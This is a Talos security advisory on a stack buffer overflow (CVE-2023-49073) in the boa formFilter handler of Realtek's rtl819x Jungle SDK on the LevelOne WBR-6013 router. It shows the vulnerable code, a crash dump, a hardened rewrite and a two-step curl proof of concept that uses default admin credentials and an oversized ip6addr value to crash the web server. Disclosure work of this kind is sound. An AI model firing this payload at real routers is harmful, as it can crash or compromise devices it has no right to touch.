Talos Vulnerability Report

TALOS-2023-1875

Realtek rtl819x Jungle SDK boa formFilter stack-based buffer overflow vulnerability

July 8, 2024
CVE Number

CVE-2023-49073

SUMMARY

A stack-based buffer overflow vulnerability exists in the boa formFilter functionality of Realtek rtl819x Jungle SDK v3.4.11. A specially crafted series of HTTP requests can lead to arbitrary code execution. An attacker can send a sequence of requests to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

LevelOne WBR-6013 RER4_A_v3411b_2T2R_LEV_09_170623
Realtek rtl819x Jungle SDK v3.4.11

PRODUCT URLS

rtl819x Jungle SDK - https://www.realtek.com/en/
WBR-6013 - https://www.level1.com/level1_en/wbr-6013-n300-wireless-router-54069103

CVSSv3 SCORE

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-121 - Stack-based Buffer Overflow

DETAILS

The rtl819x Jungle SDK is an SDK for routers. It uses boa as its web server.

This Realtek rtl819x Jungle SDK vulnerability was found while researching the LevelOne WBR-6013 router. We are going to explain this vulnerability from the perspective of the WBR-6013 router.

The WBR-6013 router runs a web server called boa; the firmware on the device is built on Realtek's SDK, which in turn uses boa. One of the SDK's APIs is /boafrm/formFilter. This API allows the creation of filters that restrict connections to the internet. The function responsible for this API is boa's formFilter:

void formFilter(request *wp, char *path, char *query)
{
    [...]
    IPFILTER_T ipEntry, ipentrytmp;
    [...]

[1] strAddIp = req_get_cstream_var(wp, ("addFilterIp"), "");
    [...]


    if (strAddIp[0]) {
        strVal = req_get_cstream_var(wp, ("ip"), "");
[2]     strIP6 = req_get_cstream_var(wp, ("ip6addr"), "");
        ip6Enable = req_get_cstream_var(wp, ("ip6_enabled"), "");
        ip4Enable = req_get_cstream_var(wp, ("ip_enabled"), "");

        [...]

        if(strIP6[0]){
            ipEntry.ipVer=IPv6;
[3]         strcpy(ipEntry.ip6Addr,strIP6);
        }
        [...]
    }
    [...]
}

At [1] the addFilterIp request parameter is fetched and, if it is not empty, the code at [2] is executed. At [2] the ip6addr request parameter is fetched, and it is used at [3] if its value is not empty. At [3] the value of the ip6addr parameter is copied into the ip6Addr struct member of the stack variable ipEntry.

Because no check is performed on the length of the ip6addr parameter string before the strcpy at [3], a stack-based buffer overflow of the ipEntry variable can occur there. An attacker could exploit this vulnerability to achieve arbitrary code execution.
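A hardened replacement for the copy at [3], as an added example that is not the SDK's or the vendor's code: the IPFILTER_T layout, the ip6Addr field size and the function names are assumptions. It bounds the input length against the destination and validates the value with inet_pton before anything is copied, so the oversized value from the PoC is rejected and the entry is left untouched.

```c
#include <arpa/inet.h>
#include <stdlib.h>
#include <string.h>

/* Assumed layout: the advisory does not show the real IPFILTER_T, so the
 * field sizes here are illustrative. INET6_ADDRSTRLEN (46) holds the longest
 * textual IPv6 address plus its NUL terminator. */
typedef enum { IPv4 = 4, IPv6 = 6 } ip_ver_t;
typedef struct {
    ip_ver_t ipVer;
    char     ip6Addr[INET6_ADDRSTRLEN];
} IPFILTER_T;

/* Hardened replacement for the strcpy at [3]: reject anything that does not
 * fit the destination, then require a well-formed IPv6 literal, and only then
 * copy. Returns 0 on success, -1 if the input is rejected; on failure the
 * entry is left untouched. */
int set_ip6_filter(IPFILTER_T *entry, const char *strIP6)
{
    struct in6_addr parsed;
    if (entry == NULL || strIP6 == NULL || strIP6[0] == '\0')
        return -1;
    /* Length check before any copy (request values are NUL-terminated). */
    if (strlen(strIP6) >= sizeof entry->ip6Addr)
        return -1;
    /* Semantic check: inet_pton accepts only a valid IPv6 address string. */
    if (inet_pton(AF_INET6, strIP6, &parsed) != 1)
        return -1;
    entry->ipVer = IPv6;
    memcpy(entry->ip6Addr, strIP6, strlen(strIP6) + 1);
    return 0;
}

/* Constructs an over-long value of 'A's, like the PoC's ip6addr parameter,
 * and reports 1 if the hardened setter rejects it without touching the entry. */
int rejects_oversized(size_t len)
{
    IPFILTER_T entry;
    char *buf = malloc(len + 1);
    if (buf == NULL)
        return 0;
    memset(buf, 'A', len);
    buf[len] = '\0';
    memset(&entry, 0, sizeof entry);
    int rejected = set_ip6_filter(&entry, buf) == -1 && entry.ip6Addr[0] == '\0';
    free(buf);
    return rejected;
}
```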

Crash Information

Program received signal SIGSEGV, Segmentation fault.
0x00415c48 in ?? ()

[ Legend: Modified register | Code | Heap | Stack | String ]
────────────────────────────── registers ──────────────────────────────
$zero: 0x00000000  →  0x00000000
$at  : 0xfffffff8  →  0xfffffff8
$v0  : 0x408003da  →  0x41414141  →  0x41414141 ("AAAA"?)
$v1  : 0x41414141  →  0x41414141 ("AAAA"?)
$a0  : 0x00000000  →  0x00000000
$a1  : 0x004c0404  →  0x00414141  →  0x02ffff02  →  0x02ffff02
$a2  : 0x3ff82f00  →  0x00000000  →  0x00000000
$a3  : 0x004c0240  →  0x41414141  →  0x41414141 ("AAAA"?)
$t0  : 0x004c05f8  →  0x41410065  →  0x41410065
$t1  : 0x41414141  →  0x41414141 ("AAAA"?)
$t2  : 0x00000b59  →  0x00000b59
$t3  : 0x41414141  →  0x41414141 ("AAAA"?)
$t4  : 0x41414141  →  0x41414141 ("AAAA"?)
$t5  : 0x41414141  →  0x41414141 ("AAAA"?)
$t6  : 0x41414141  →  0x41414141 ("AAAA"?)
$t7  : 0x004b0000  →  0x004b0000
$s0  : 0x004c28d0  →  0x00000005  →  0x00000005
$s1  : 0x004a0000  →  0x0049e9d0  →  0x456c2041  →  0x456c2041 ("El A"?)
$s2  : 0x408003c0  →  0x00000000  →  0x00000000
$s3  : 0x00020078  →  0x00020078
$s4  : 0x004a0adc  →  0x00000000  →  0x00000000
$s5  : 0x004a0000  →  0x0049e9d0  →  0x456c2041  →  0x456c2041 ("El A"?)
$s6  : 0x004a0adc  →  0x00000000  →  0x00000000
$s7  : 0x004c0220  →  0x31003070  →  0x31003070
$t8  : 0x004b5650  →  0x3ff44ff0  →  0x00801021  →  0x00801021
$t9  : 0x3ff44ff0  →  0x00801021  →  0x00801021
$k0  : 0x00000000  →  0x00000000
$k1  : 0x00000000  →  0x00000000
$s8  : 0x004a0adc  →  0x00000000  →  0x00000000
$pc  : 0x00415c48  →  0x80620000  →  0x80620000
$sp  : 0x40800290  →  0x00000000  →  0x00000000
$hi  : 0x0000006b  →  0x0000006b
$lo  : 0x000394d1  →  0x000394d1
$fir : 0x00739300  →  0x00739300
$ra  : 0x00415c38  →  0x8fa30224  →  0x8fa30224
$gp  : 0x3ff875c0  →  0x6c5f636f  →  0x6c5f636f ("l_co"?)
────────────────────────────── stack ──────────────────────────────
0x40800290│+0x0000: 0x00000000  →  0x00000000	 ← $sp
0x40800294│+0x0004: 0x00000000  →  0x00000000
0x40800298│+0x0008: 0x00000000  →  0x00000000
0x4080029c│+0x000c: 0x00000000  →  0x00000000
0x408002a0│+0x0010: 0x40007010  →  0x00000000  →  0x00000000
0x408002a4│+0x0014: 0x00000000  →  0x00000000
0x408002a8│+0x0018: 0x3ff29698  →  0x00000000  →  0x00000000
0x408002ac│+0x001c: 0x3ff2c728  →  0x005f474c  →  0x005f474c
────────────────────────────── code:mips:MIPS32 ──────────────────────────────
     0x415c3c                  j      0x415c48
     0x415c40                  nop    
     0x415c44                  sb     v0, 378(sp)
 →   0x415c48                  lb     v0, 0(v1)
     0x415c4c                  nop    
     0x415c50                  beqz   v0, 0x415cb4
     0x415c54                  move   a0, v1
     0x415c58                  addiu  a1, sp, 304
     0x415c5c                  jal    0x402780
────────────────────────────── threads ──────────────────────────────
[#0] Id 1, stopped 0x415c48 in ?? (), reason: SIGSEGV

Exploit Proof of Concept

Because of a CSRF protection mechanism in the web server, a specific API can only be used after loading the HTML page that would call that API:

curl --user admin:admin http://<DEVICE_IP>/ip6filter.htm &>/dev/null

After this request it is possible to use the /boafrm/formFilter API:

curl -d "addFilterIp=1&ip6addr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -X POST -H "Content-Type: application/x-www-form-urlencoded" --user admin:admin http://<DEVICE_IP>/boafrm/formFilter

After this request the boa process crashes. The PoC uses the default admin credentials.

VENDOR RESPONSE

Realtek has provided updated software to its customers. LevelOne has declined to patch the issues in their software.

TIMELINE

2023-12-14 - Initial Vendor Contact
2023-12-22 - Vendor Disclosure
2024-05-20 - Vendor Patch Release
2024-07-08 - Public Release

Credit

Discovered by Francesco Benvenuto of Cisco Talos.